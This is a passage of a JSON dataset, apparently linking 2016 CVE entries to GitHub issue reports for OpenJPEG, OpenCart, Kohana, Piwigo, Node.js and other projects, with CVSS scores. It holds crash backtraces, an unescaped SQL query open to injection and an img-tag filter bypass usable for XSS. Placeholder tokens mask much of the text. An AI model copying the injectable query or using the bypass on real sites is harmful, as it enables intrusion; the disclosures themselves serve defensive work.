Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING",
  1543. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1544. "severity": "CRITICAL",
  1545. "baseScore": 9.8,
  1546. "impactScore": 5.9,
  1547. "exploitabilityScore": 3.9
  1548. },
  1549. {
  1550. "CVE_ID": "CVE-2016-10504",
  1551. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/835",
  1552. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/835",
  1553. "Repo_new": "uclouvain/openjpeg",
  1554. "Issue_Created_At": "2016-09-13T10:13:45Z",
  1555. "description": "Out of Bounds Write in opj_mqc_byteout of mqc.c. DESCRIPTION ============== An Out of Bounds Write issue can occur in function opj_mqc_byteout of mqc.c while executing opj_compress . This issue was caused by a malformed BMP file. CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . TESTED VERSION ============== Master version of APITAG NUMBERTAG f, PATHTAG ) EXCEPTION LOG ============== ERRORTAG",
  1556. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1557. "severity": "MEDIUM",
  1558. "baseScore": 6.5,
  1559. "impactScore": 3.6,
  1560. "exploitabilityScore": 2.8
  1561. },
  1562. {
  1563. "CVE_ID": "CVE-2016-10505",
  1564. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/792",
  1565. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/792",
  1566. "Repo_new": "uclouvain/openjpeg",
  1567. "Issue_Created_At": "2016-06-28T02:15:25Z",
  1568. "description": "Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c. Title Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1569. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1570. "severity": "MEDIUM",
  1571. "baseScore": 6.5,
  1572. "impactScore": 3.6,
  1573. "exploitabilityScore": 2.8
  1574. },
  1575. {
  1576. "CVE_ID": "CVE-2016-10505",
  1577. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/785",
  1578. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/785",
  1579. "Repo_new": "uclouvain/openjpeg",
  1580. "Issue_Created_At": "2016-05-25T03:47:58Z",
  1581. "description": "Null Pointer Access in function color_esycc_to_rgb of color.c. Title Null Pointer Access in function color_esycc_to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1582. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1583. "severity": "MEDIUM",
  1584. "baseScore": 6.5,
  1585. "impactScore": 3.6,
  1586. "exploitabilityScore": 2.8
  1587. },
  1588. {
  1589. "CVE_ID": "CVE-2016-10505",
  1590. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/784",
  1591. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/784",
  1592. "Repo_new": "uclouvain/openjpeg",
  1593. "Issue_Created_At": "2016-05-25T03:47:12Z",
  1594. "description": "Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c. Title Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1595. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1596. "severity": "MEDIUM",
  1597. "baseScore": 6.5,
  1598. "impactScore": 3.6,
  1599. "exploitabilityScore": 2.8
  1600. },
  1601. {
  1602. "CVE_ID": "CVE-2016-10505",
  1603. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/776",
  1604. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/776",
  1605. "Repo_new": "uclouvain/openjpeg",
  1606. "Issue_Created_At": "2016-05-06T06:09:25Z",
  1607. "description": "Null Pointer Access in function imagetopnm of convert.c. Title APITAG Null Pointer Access in function imagetopnm of convert.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1608. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1609. "severity": "MEDIUM",
  1610. "baseScore": 6.5,
  1611. "impactScore": 3.6,
  1612. "exploitabilityScore": 2.8
  1613. },
  1614. {
  1615. "CVE_ID": "CVE-2016-10506",
  1616. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/780",
  1617. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/780",
  1618. "Repo_new": "uclouvain/openjpeg",
  1619. "Issue_Created_At": "2016-05-06T06:11:42Z",
  1620. "description": "division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1621. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1622. "severity": "MEDIUM",
  1623. "baseScore": 6.5,
  1624. "impactScore": 3.6,
  1625. "exploitabilityScore": 2.8
  1626. },
  1627. {
  1628. "CVE_ID": "CVE-2016-10506",
  1629. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/779",
  1630. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/779",
  1631. "Repo_new": "uclouvain/openjpeg",
  1632. "Issue_Created_At": "2016-05-06T06:11:12Z",
  1633. "description": "division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1634. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1635. "severity": "MEDIUM",
  1636. "baseScore": 6.5,
  1637. "impactScore": 3.6,
  1638. "exploitabilityScore": 2.8
  1639. },
  1640. {
  1641. "CVE_ID": "CVE-2016-10506",
  1642. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/778",
  1643. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/778",
  1644. "Repo_new": "uclouvain/openjpeg",
  1645. "Issue_Created_At": "2016-05-06T06:10:50Z",
  1646. "description": "division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1647. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1648. "severity": "MEDIUM",
  1649. "baseScore": 6.5,
  1650. "impactScore": 3.6,
  1651. "exploitabilityScore": 2.8
  1652. },
  1653. {
  1654. "CVE_ID": "CVE-2016-10506",
  1655. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/777",
  1656. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/777",
  1657. "Repo_new": "uclouvain/openjpeg",
  1658. "Issue_Created_At": "2016-05-06T06:10:19Z",
  1659. "description": "division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  1660. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1661. "severity": "MEDIUM",
  1662. "baseScore": 6.5,
  1663. "impactScore": 3.6,
  1664. "exploitabilityScore": 2.8
  1665. },
  1666. {
  1667. "CVE_ID": "CVE-2016-10506",
  1668. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/732",
  1669. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/732",
  1670. "Repo_new": "uclouvain/openjpeg",
  1671. "Issue_Created_At": "2016-03-28T08:55:53Z",
  1672. "description": "division by zero (SIGFPE) error in opj_pi_next_cprl function in (line NUMBERTAG of pi.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG j2k Starting program: PATHTAG o image.pgm i crashes NUMBERTAG j2k Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb8d NUMBERTAG in opj_pi_next_cprl (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG if (!((pi >x % (OPJ_INT NUMBERTAG comp >dx APITAG x == pi >t NUMBERTAG tr NUMBERTAG APITAG d NUMBERTAG gdb) p rp NUMBERTAG gdb) bt NUMBERTAG b7fb8d NUMBERTAG in opj_pi_next_cprl (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG b7fbc4cc in opj_pi_next (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG b7fc0b8d in opj_t2_decode_packets (p_t NUMBERTAG p_tile_no NUMBERTAG p_tile NUMBERTAG d0, p_src NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_len NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG in opj_tcd_t2_decode (p_tcd NUMBERTAG p_src_data NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_src_size NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc5d NUMBERTAG in opj_tcd_decode_tile (p_tcd NUMBERTAG p_src NUMBERTAG d8 PATHTAG p_max_length NUMBERTAG p_tile_no NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG a in opj_j2k_decode_tile (p_j2k NUMBERTAG p_tile_inde NUMBERTAG p_data NUMBERTAG c8 \"\", p_data_size NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, 
p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG cc0) at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of comp >dx is NUMBERTAG and the value of rpx is NUMBERTAG The value evaluated from (OPJ_INT NUMBERTAG comp >dx APITAG x%(OPJ_INT NUMBERTAG comp >dx<<rpx) will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a j2k file to generate the APITAG APITAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
  1673. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1674. "severity": "MEDIUM",
  1675. "baseScore": 6.5,
  1676. "impactScore": 3.6,
  1677. "exploitabilityScore": 2.8
  1678. },
  1679. {
  1680. "CVE_ID": "CVE-2016-10506",
  1681. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/731",
  1682. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/731",
  1683. "Repo_new": "uclouvain/openjpeg",
  1684. "Issue_Created_At": "2016-03-28T08:54:54Z",
  1685. "description": "division by zero (SIGFPE) error in opj_pi_next_cprl function (line NUMBERTAG of pi.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG j2k Starting program: PATHTAG o image.pgm i crashes NUMBERTAG j2k Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb8ca1 in opj_pi_next_cprl (pi NUMBERTAG d8) at PATHTAG NUMBERTAG if (!((pi >y % (OPJ_INT NUMBERTAG comp >dy APITAG y == pi >ty0) && ((try0 APITAG dy NUMBERTAG gdb) bt NUMBERTAG b7fb8ca1 in opj_pi_next_cprl (pi NUMBERTAG d8) at PATHTAG NUMBERTAG b7fbc4cc in opj_pi_next (pi NUMBERTAG d8) at PATHTAG NUMBERTAG b7fc0b8d in opj_t2_decode_packets (p_t NUMBERTAG a NUMBERTAG p_tile_no NUMBERTAG p_tile NUMBERTAG d0, p_src NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_len NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG in opj_tcd_t2_decode (p_tcd NUMBERTAG p_src_data NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_src_size NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc5d NUMBERTAG in opj_tcd_decode_tile (p_tcd NUMBERTAG p_src NUMBERTAG d8 PATHTAG p_max_length NUMBERTAG p_tile_no NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG a in opj_j2k_decode_tile (p_j2k NUMBERTAG p_tile_inde NUMBERTAG p_data NUMBERTAG c8 \"\", p_data_size NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG 
NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG cc0) at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of comp >dy is NUMBERTAG and the value of rpy is NUMBERTAG The value evaluated from (OPJ_INT NUMBERTAG comp >dy APITAG y%(OPJ_INT NUMBERTAG comp >dy<<rpy) will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a j2k file to generate the APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG PATHTAG PATHTAG APITAG APITAG APITAG APITAG PATHTAG APITAG PATHTAG APITAG APITAG APITAG PATHTAG PATHTAG APITAG APITAG tJy NUMBERTAG fprv/Z Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
  1686. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1687. "severity": "MEDIUM",
  1688. "baseScore": 6.5,
  1689. "impactScore": 3.6,
  1690. "exploitabilityScore": 2.8
  1691. },
  1692. {
  1693. "CVE_ID": "CVE-2016-10507",
  1694. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/833",
  1695. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/833",
  1696. "Repo_new": "uclouvain/openjpeg",
  1697. "Issue_Created_At": "2016-09-13T09:12:33Z",
  1698. "description": "Out of Bounds Read in function bmp NUMBERTAG toimage of convertbmp.c. DESCRIPTION ============== An Out of Bounds Read issue was found in function bmp NUMBERTAG toimage of convertbmp.c. The root cause of this issue was an Integer Overflow issue. The opj_compress process may crash in other functions. CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . TESTED VERSION ============== Master version of APITAG NUMBERTAG f, PATHTAG ) EXCEPTION LOG ============== ERRORTAG ANALYSIS ============== The integer overflow issue exists in function bmptoimage. Here APITAG NUMBERTAG and APITAG NUMBERTAG and stride should equal NUMBERTAG APITAG But actually stride equals NUMBERTAG when the overflow happened. CODETAG",
  1699. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1700. "severity": "MEDIUM",
  1701. "baseScore": 6.5,
  1702. "impactScore": 3.6,
  1703. "exploitabilityScore": 2.8
  1704. },
  1705. {
  1706. "CVE_ID": "CVE-2016-10509",
  1707. "Issue_Url_old": "https://github.com/opencart/opencart/issues/4114",
  1708. "Issue_Url_new": "https://github.com/opencart/opencart/issues/4114",
  1709. "Repo_new": "opencart/opencart",
  1710. "Issue_Created_At": "2016-03-14T09:58:52Z",
  1711. "description": "Input not sanitized. Hi, I think I found a variable that's not sanitized and could lead to a SQL Injection or information disclosure. The source is APITAG $carrier = $this >request APITAG As I checked under APITAG documentation Request class uses APITAG and encodes double quotes so it's still possible to use single quote right? Most of your database queries use APITAG to prevent that from happening. I found one that doesn't use escape before going to a SQL query. So we have this line: $carrier = $this >request APITAG (...) $this >model_openbay_amazon APITAG $carrier, $carrier_from_list, !empty($carrier) ? $this >request >post['tracking'][$order_id] : ''); After this it calls FILETAG file: public function APITAG $courier_id, $courier_from_list, $tracking_no) { $this >db >query(\" UPDATE APITAG SET APITAG = '\" . $courier_id . \"', APITAG = \" . (int)!$courier_from_list . \", APITAG = '\" . $tracking_no . \"' WHERE APITAG = \" . (int)$order_id . \"\"); } Because the single quote is not escaped and the Query class uses single quotes as delimiters, a SQL Injection is possible here. A possible solution is to use APITAG function on courier_id. I hope I'm not mistaken and feel free to give me your feedback. Best,",
  1712. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  1713. "severity": "HIGH",
  1714. "baseScore": 7.2,
  1715. "impactScore": 5.9,
  1716. "exploitabilityScore": 1.2
  1717. },
  1718. {
  1719. "CVE_ID": "CVE-2016-10510",
  1720. "Issue_Url_old": "https://github.com/kohana/kohana/issues/107",
  1721. "Issue_Url_new": "https://github.com/kohana/kohana/issues/107",
  1722. "Repo_new": "kohana/kohana",
  1723. "Issue_Created_At": "2016-05-18T17:29:05Z",
  1724. "description": "Security::strip_image_tags bypass. Hi, I found a security issue on your latest version. In your security class \u2013 PATHTAG you have the following function to remove img tags from strings: ERRORTAG Just by looking at that regex it's possible to see that after <img it expects a space. So to bypass this you could use: <img/src... PHP example: ERRORTAG And it's still possible to inject a IMG on a string in this case with a XSS vector. Hope it helps. Best, David Sopas Checkmarx.com",
  1725. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1726. "severity": "MEDIUM",
  1727. "baseScore": 6.1,
  1728. "impactScore": 2.7,
  1729. "exploitabilityScore": 2.8
  1730. },
  1731. {
  1732. "CVE_ID": "CVE-2016-10513",
  1733. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/548",
  1734. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/548",
  1735. "Repo_new": "piwigo/piwigo",
  1736. "Issue_Created_At": "2016-11-17T13:10:10Z",
  1737. "description": "quick search and HTML comment. Sanitize quick search expression before sending it to HTML comment on frontend",
  1738. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1739. "severity": "MEDIUM",
  1740. "baseScore": 6.1,
  1741. "impactScore": 2.7,
  1742. "exploitabilityScore": 2.8
  1743. },
  1744. {
  1745. "CVE_ID": "CVE-2016-10514",
  1746. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/547",
  1747. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/547",
  1748. "Repo_new": "piwigo/piwigo",
  1749. "Issue_Created_At": "2016-11-17T12:37:46Z",
  1750. "description": "increase checks on url format. Basic filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED | FILTER_FLAG_HOST_REQUIRED) is not very strong. We need something stronger.",
  1751. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  1752. "severity": "MEDIUM",
  1753. "baseScore": 6.5,
  1754. "impactScore": 3.6,
  1755. "exploitabilityScore": 2.8
  1756. },
  1757. {
  1758. "CVE_ID": "CVE-2016-10519",
  1759. "Issue_Url_old": "https://github.com/feross/bittorrent-dht/issues/87",
  1760. "Issue_Url_new": "https://github.com/webtorrent/bittorrent-dht/issues/87",
  1761. "Repo_new": "webtorrent/bittorrent-dht",
  1762. "Issue_Created_At": "2016-01-02T21:59:46Z",
  1763. "description": "IMPORTANT: Critical security issue fixed in NUMBERTAG All users should upgrade.. We just fixed a security issue in the APITAG module that would allow an attacker to send a specific series of messages to a listening peer to make it disclose internal memory of the FILETAG process. All users of APITAG should upgrade to version NUMBERTAG or later.",
  1764. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  1765. "severity": "HIGH",
  1766. "baseScore": 7.5,
  1767. "impactScore": 3.6,
  1768. "exploitabilityScore": 3.9
  1769. },
  1770. {
  1771. "CVE_ID": "CVE-2016-10523",
  1772. "Issue_Url_old": "https://github.com/mcollina/mosca/issues/393",
  1773. "Issue_Url_new": "https://github.com/moscajs/mosca/issues/393",
  1774. "Repo_new": "moscajs/mosca",
  1775. "Issue_Created_At": "2016-01-14T15:53:51Z",
  1776. "description": "Mosca crashes when connecting with TLS on MQTT Port. By accident we have found critical behavior in Mosca: when connecting with a TLS connection on the plain mqtt port, the whole broker simply crashes with error: ERRORTAG One liner to reproduce this behavior (assuming standard mosca running on localhost): APITAG We will dig further into it and provide a PR if we have a fix. Meanwhile we wanted to share the bug in case somebody is quicker in spotting the solution.",
  1777. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1778. "severity": "HIGH",
  1779. "baseScore": 7.5,
  1780. "impactScore": 3.6,
  1781. "exploitabilityScore": 3.9
  1782. },
  1783. {
  1784. "CVE_ID": "CVE-2016-10525",
  1785. "Issue_Url_old": "https://github.com/dwyl/hapi-auth-jwt2/issues/111",
  1786. "Issue_Url_new": "https://github.com/dwyl/hapi-auth-jwt2/issues/111",
  1787. "Repo_new": "dwyl/hapi-auth-jwt2",
  1788. "Issue_Created_At": "2015-10-14T19:20:42Z",
  1789. "description": "Regression: APITAG is true and APITAG is {} when user not logged in. With the latest version of the plugin my APITAG routes exhibit this behaviour. This did not happen previously.",
  1790. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1791. "severity": "CRITICAL",
  1792. "baseScore": 9.8,
  1793. "impactScore": 5.9,
  1794. "exploitabilityScore": 3.9
  1795. },
  1796. {
  1797. "CVE_ID": "CVE-2016-10527",
  1798. "Issue_Url_old": "https://github.com/riot/compiler/issues/46",
  1799. "Issue_Url_new": "https://github.com/riot/compiler/issues/46",
  1800. "Repo_new": "riot/compiler",
  1801. "Issue_Created_At": "2016-01-16T18:23:33Z",
  1802. "description": "NUMBERTAG unpublished. riot compiler NUMBERTAG has an issue in a regex APITAG Backtracking) that makes it unusable under certain conditions, so it is unpublished now.",
  1803. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1804. "severity": "HIGH",
  1805. "baseScore": 7.5,
  1806. "impactScore": 3.6,
  1807. "exploitabilityScore": 3.9
  1808. },
  1809. {
  1810. "CVE_ID": "CVE-2016-10533",
  1811. "Issue_Url_old": "https://github.com/florianholzapfel/express-restify-mongoose/issues/252",
  1812. "Issue_Url_new": "https://github.com/florianholzapfel/express-restify-mongoose/issues/252",
  1813. "Repo_new": "florianholzapfel/express-restify-mongoose",
  1814. "Issue_Created_At": "2016-02-13T08:48:50Z",
  1815. "description": "Leaking private/protected data. say you have an User model: APITAG normally you want to never expose the password, under any circumstances, so you'd normally do: APITAG Now this works with hitting any endpoint: APITAG does not show the fields APITAG also does not show the password HOWEVER: APITAG shows ALL passwords for ALL users in the database ... This is a huge security concern",
  1816. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  1817. "severity": "HIGH",
  1818. "baseScore": 8.8,
  1819. "impactScore": 5.9,
  1820. "exploitabilityScore": 2.8
  1821. },
  1822. {
  1823. "CVE_ID": "CVE-2016-10534",
  1824. "Issue_Url_old": "https://github.com/electron-userland/electron-packager/issues/333",
  1825. "Issue_Url_new": "https://github.com/electron/electron-packager/issues/333",
  1826. "Repo_new": "electron/electron-packager",
  1827. "Issue_Created_At": "2016-04-19T01:29:54Z",
  1828. "description": "SECURITY NOTICE: electron packager NUMBERTAG doesn't check SSL certificate validity. There exists a bug in electron packager from versions NUMBERTAG where the APITAG command line option defaults to false when not explicitly set to true. This only affects users using the electron packager CLI. The APITAG option defaults to true for the FILETAG API. The commit that introduced the issue is here: URLTAG The issue is fixed in NUMBERTAG",
  1829. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  1830. "severity": "MEDIUM",
  1831. "baseScore": 5.9,
  1832. "impactScore": 3.6,
  1833. "exploitabilityScore": 2.2
  1834. },
  1835. {
  1836. "CVE_ID": "CVE-2016-10538",
  1837. "Issue_Url_old": "https://github.com/node-js-libs/cli/issues/81",
  1838. "Issue_Url_new": "https://github.com/node-js-libs/cli/issues/81",
  1839. "Repo_new": "node-js-libs/cli",
  1840. "Issue_Created_At": "2016-06-16T08:30:30Z",
  1841. "description": "[security] Insecure usage of temporary files.. The current code makes use of predictable filenames, in a way that causes a security issue. I reported this to Debian last year: CVETAG It was recently highlighted by the nodesecurity people (six months later!): URLTAG Suggested fix: Avoid using predictable filenames in world writable directories. Using APITAG would be better than APITAG for example.",
  1842. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
  1843. "severity": "LOW",
  1844. "baseScore": 3.5,
  1845. "impactScore": 1.4,
  1846. "exploitabilityScore": 2.1
  1847. },
  1848. {
  1849. "CVE_ID": "CVE-2016-10542",
  1850. "Issue_Url_old": "https://github.com/nodejs/node/issues/7388",
  1851. "Issue_Url_new": "https://github.com/nodejs/node/issues/7388",
  1852. "Repo_new": "nodejs/node",
  1853. "Issue_Created_At": "2016-06-23T16:09:20Z",
  1854. "description": "Error: APITAG failed exploit/(d)dos?. Version NUMBERTAG Platform : Linu NUMBERTAG generic APITAG Ubuntu SMP Thu Jun NUMBERTAG UTC NUMBERTAG APITAG APITAG Node server using socket.io is getting hit by some kind of attack that makes it crash, with the error APITAG failed\". At first I thought I'm just trying to process some really long string sent via sockets by an user, but it's not, it crashes even without doing anything with the messages coming in from the socket events. The code below is the most barebones I could get the actual server while still having it be vulnerable to whatever this is. The \"socketio wildcard\" was only added to this so I could see all the events sent in, but there is none when it's actually crashing, just a new connection opening then it goes down. It's definitely some sort of attack or exploit, cloning the server to a different IP made it stop, until after the new was released to the public (site put back online). There were also some spikes in traffic but they didn't coincide with the actual crashes so I'm gonna assume they were just some failed ddos attempts not related to this issue. Anyone encountered this before? Code: ERRORTAG Error: ERRORTAG Full log of the output when crashing: URLTAG Couldn't do anymore logging because after some time the \"attack\" stopped, it used to keep going even after the server crashed, but right now it seems to be more \"calculated\" so to speak, stopping as soon as the server crashes, making it really difficult for me to debug anything.",
  1855. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  1856. "severity": "HIGH",
  1857. "baseScore": 7.5,
  1858. "impactScore": 3.6,
  1859. "exploitabilityScore": 3.9
  1860. },
  1861. {
  1862. "CVE_ID": "CVE-2016-10543",
  1863. "Issue_Url_old": "https://github.com/hapijs/hapi/issues/3228",
